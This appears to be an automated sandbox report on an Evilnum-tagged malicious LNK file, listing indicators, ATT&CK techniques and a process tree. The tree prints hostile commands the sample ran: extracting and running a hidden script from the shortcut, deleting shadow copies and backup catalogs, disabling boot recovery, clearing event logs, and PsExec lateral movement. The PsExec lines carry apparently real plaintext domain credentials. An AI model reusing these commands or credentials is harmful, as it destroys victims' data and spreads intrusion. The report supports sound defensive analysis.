evilnum | 0d878b1b9f5c1ae8925e55df9e10b4271eb99970af133e251830044d24296ba8

Analysis

max time kernel
152s
max time network
155s
platform
windows10_x64
resource
win10v20201028
submitted
26-12-2020 20:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90.lnk
Size

938KB
MD5

fc00819c4cdc8609313041cf345a7dca
SHA1

3cb2d94e7a3b6d6141106e3973189e06306ce2f0
SHA256

83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90
SHA512

53b2761be2a805aa6cdc7857b70da8b25ccf0990dc1f9a6501ed73af9909db6a58667b9bcd786c9acc19309b18bc228ac02d3ebe97063b1cf6bf2362c935131c

Score

10^/10

evilnum evasion ransomware trojan

Malware Config

Signatures

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3388	bcdedit.exe
2680	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1256	wbadmin.exe

Executes dropped EXE 16 IoCs

pid	Process
4048	xgjyg.exe
4368	_wou.exe
680	_hrr.exe
364	_hrr.exe
856	_hrr.exe
904	_hrr.exe
1136	_hrr.exe
3116	PSEXESVC.exe
2512	_hrr.exe
4260	_hrr.exe
4312	_wbf.exe
4316	_hrr.exe
1168	_hrr.exe
4712	_hrr.exe
4588	_hrr.exe
5096	_hrr.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\PSEXESVC.exe	_hrr.exe
File created	C:\Windows\PSEXESVC.exe	_hrr.exe
File created	C:\Windows\PSEXESVC.exe	_hrr.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
416	vssadmin.exe

Modifies data under HKEY_USERS 24 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_hrr.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4048	xgjyg.exe
4048	xgjyg.exe
4048	xgjyg.exe
4048	xgjyg.exe
4048	xgjyg.exe
4048	xgjyg.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

description	pid	Process
Token: SeAssignPrimaryTokenPrivilege	3964	_ftf.exe
Token: SeIncreaseQuotaPrivilege	3964	_ftf.exe
Token: SeSecurityPrivilege	3964	_ftf.exe
Token: SeTakeOwnershipPrivilege	3964	_ftf.exe
Token: SeLoadDriverPrivilege	3964	_ftf.exe
Token: SeSystemtimePrivilege	3964	_ftf.exe
Token: SeBackupPrivilege	3964	_ftf.exe
Token: SeRestorePrivilege	3964	_ftf.exe
Token: SeShutdownPrivilege	3964	_ftf.exe
Token: SeSystemEnvironmentPrivilege	3964	_ftf.exe
Token: SeUndockPrivilege	3964	_ftf.exe
Token: SeManageVolumePrivilege	3964	_ftf.exe
Token: SeDebugPrivilege	4048	xgjyg.exe
Token: SeShutdownPrivilege	4368	_wou.exe
Token: SeBackupPrivilege	1056	vssvc.exe
Token: SeRestorePrivilege	1056	vssvc.exe
Token: SeAuditPrivilege	1056	vssvc.exe
Token: SeBackupPrivilege	1100	wbengine.exe
Token: SeRestorePrivilege	1100	wbengine.exe
Token: SeSecurityPrivilege	1100	wbengine.exe
Token: SeAssignPrimaryTokenPrivilege	4312	_wbf.exe
Token: SeIncreaseQuotaPrivilege	4312	_wbf.exe
Token: SeSecurityPrivilege	4312	_wbf.exe
Token: SeTakeOwnershipPrivilege	4312	_wbf.exe
Token: SeLoadDriverPrivilege	4312	_wbf.exe
Token: SeSystemtimePrivilege	4312	_wbf.exe
Token: SeBackupPrivilege	4312	_wbf.exe
Token: SeRestorePrivilege	4312	_wbf.exe
Token: SeShutdownPrivilege	4312	_wbf.exe
Token: SeSystemEnvironmentPrivilege	4312	_wbf.exe
Token: SeUndockPrivilege	4312	_wbf.exe
Token: SeManageVolumePrivilege	4312	_wbf.exe

Suspicious use of WriteProcessMemory 68 IoCs

description	pid	Process	procid_target
PID 4660 wrote to memory of 5104	4660	cmd.exe	75
PID 4660 wrote to memory of 5104	4660	cmd.exe	75
PID 5104 wrote to memory of 4140	5104	cmd.exe	76
PID 5104 wrote to memory of 4140	5104	cmd.exe	76
PID 5104 wrote to memory of 2164	5104	cmd.exe	77
PID 5104 wrote to memory of 2164	5104	cmd.exe	77
PID 5104 wrote to memory of 1832	5104	cmd.exe	78
PID 5104 wrote to memory of 1832	5104	cmd.exe	78
PID 3132 wrote to memory of 3964	3132	PSEXESVC.exe	84
PID 3132 wrote to memory of 3964	3132	PSEXESVC.exe	84
PID 3132 wrote to memory of 3964	3132	PSEXESVC.exe	84
PID 3964 wrote to memory of 4048	3964	_ftf.exe	85
PID 3964 wrote to memory of 4048	3964	_ftf.exe	85
PID 3964 wrote to memory of 4368	3964	_ftf.exe	86
PID 3964 wrote to memory of 4368	3964	_ftf.exe	86
PID 3964 wrote to memory of 4368	3964	_ftf.exe	86
PID 4368 wrote to memory of 4416	4368	_wou.exe	87
PID 4368 wrote to memory of 4416	4368	_wou.exe	87
PID 4416 wrote to memory of 416	4416	cmd.exe	89
PID 4416 wrote to memory of 416	4416	cmd.exe	89
PID 3964 wrote to memory of 904	3964	_ftf.exe	90
PID 3964 wrote to memory of 904	3964	_ftf.exe	90
PID 3964 wrote to memory of 904	3964	_ftf.exe	90
PID 3964 wrote to memory of 856	3964	_ftf.exe	91
PID 3964 wrote to memory of 856	3964	_ftf.exe	91
PID 3964 wrote to memory of 856	3964	_ftf.exe	91
PID 3964 wrote to memory of 364	3964	_ftf.exe	93
PID 3964 wrote to memory of 364	3964	_ftf.exe	93
PID 3964 wrote to memory of 364	3964	_ftf.exe	93
PID 3964 wrote to memory of 680	3964	_ftf.exe	92
PID 3964 wrote to memory of 680	3964	_ftf.exe	92
PID 3964 wrote to memory of 680	3964	_ftf.exe	92
PID 3964 wrote to memory of 1136	3964	_ftf.exe	95
PID 3964 wrote to memory of 1136	3964	_ftf.exe	95
PID 3964 wrote to memory of 1136	3964	_ftf.exe	95
PID 3964 wrote to memory of 2512	3964	_ftf.exe	102
PID 3964 wrote to memory of 2512	3964	_ftf.exe	102
PID 3964 wrote to memory of 2512	3964	_ftf.exe	102
PID 4368 wrote to memory of 4512	4368	_wou.exe	104
PID 4368 wrote to memory of 4512	4368	_wou.exe	104
PID 3964 wrote to memory of 4260	3964	_ftf.exe	107
PID 3964 wrote to memory of 4260	3964	_ftf.exe	107
PID 3964 wrote to memory of 4260	3964	_ftf.exe	107
PID 4512 wrote to memory of 1256	4512	cmd.exe	108
PID 4512 wrote to memory of 1256	4512	cmd.exe	108
PID 3964 wrote to memory of 1168	3964	_ftf.exe	111
PID 3964 wrote to memory of 1168	3964	_ftf.exe	111
PID 3964 wrote to memory of 1168	3964	_ftf.exe	111
PID 3964 wrote to memory of 4316	3964	_ftf.exe	112
PID 3964 wrote to memory of 4316	3964	_ftf.exe	112
PID 3964 wrote to memory of 4316	3964	_ftf.exe	112
PID 3116 wrote to memory of 4312	3116	PSEXESVC.exe	113
PID 3116 wrote to memory of 4312	3116	PSEXESVC.exe	113
PID 3116 wrote to memory of 4312	3116	PSEXESVC.exe	113
PID 3964 wrote to memory of 4712	3964	_ftf.exe	114
PID 3964 wrote to memory of 4712	3964	_ftf.exe	114
PID 3964 wrote to memory of 4712	3964	_ftf.exe	114
PID 3964 wrote to memory of 4588	3964	_ftf.exe	115
PID 3964 wrote to memory of 4588	3964	_ftf.exe	115
PID 3964 wrote to memory of 4588	3964	_ftf.exe	115
PID 4312 wrote to memory of 2616	4312	_wbf.exe	124
PID 4312 wrote to memory of 2616	4312	_wbf.exe	124
PID 4312 wrote to memory of 2616	4312	_wbf.exe	124
PID 4312 wrote to memory of 2616	4312	_wbf.exe	124
PID 4312 wrote to memory of 2616	4312	_wbf.exe	124
PID 3964 wrote to memory of 5096	3964	_ftf.exe	121
PID 3964 wrote to memory of 5096	3964	_ftf.exe	121
PID 3964 wrote to memory of 5096	3964	_ftf.exe	121

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:4660
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&move "VerificationDocuments.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "END2">"C:\Users\Admin\AppData\Local\Temp\0.js"&wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:4140
- - C:\Windows\system32\find.exe
    find "END2"
    3⤵
    PID:2164
- - C:\Windows\system32\wscript.exe
    wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:1832

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:3132
- C:\Windows\_ftf.exe
  "_ftf.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3964
- - C:\Windows\TEMP\xgjyg.exe
    123 \\.\pipe\1C5B7CCF-9C2E-43EA-A899-D95FFFAA9233
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4048
- - C:\Windows\TEMP\_wou.exe
    "C:\Windows\TEMP\_wou.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4416
    - - \??\c:\Windows\system32\vssadmin.exe
        
        c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4512
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin.exe delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:1256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
      4⤵
      PID:4200
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3388
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
      4⤵
      PID:988
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl System
        5⤵
        
        PID:5100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
      4⤵
      PID:4072
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl Security
        5⤵
        
        PID:1492
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:904
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:856
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:680
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:364
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:1136
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:2512
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4260
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.88 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:1168
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.66 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4316
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.74 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4712
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.80 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    PID:4588
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    - Executes dropped EXE
    PID:5096
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:3436
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:3988
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4080
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:3840
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4828
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4348
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:2852
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.80 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4432
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.88 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:2876
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4532
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4476
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:1824
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:1016
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:2668
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4056
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:3688
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.80 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:3432
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4808
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4684
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:3180
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:5092
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4912
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:420
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:1640
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:1216
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4388
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:1860
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4028
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4856
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4612
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:1340
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:1584
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:2404
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\10.10.0.80 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:4428
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:812
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:5008
- - C:\Windows\TEMP\_hrr.exe
    C:\Windows\TEMP\_hrr.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_wbf.exe"
    3⤵
    PID:2156

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3116
- C:\Windows\_wbf.exe
  "_wbf.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4312
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    PID:2616

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1768

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:4776

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:4204
- C:\Windows\_wbf.exe
  "_wbf.exe"
  2⤵
  PID:584
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    PID:4400
- C:\Windows\_wbf.exe
  "_wbf.exe"
  2⤵
  PID:2572
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    PID:3124
- C:\Windows\_wbf.exe
  "_wbf.exe"
  2⤵
  PID:3716
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    PID:3456

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Indicator Removal on Host

T1070

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

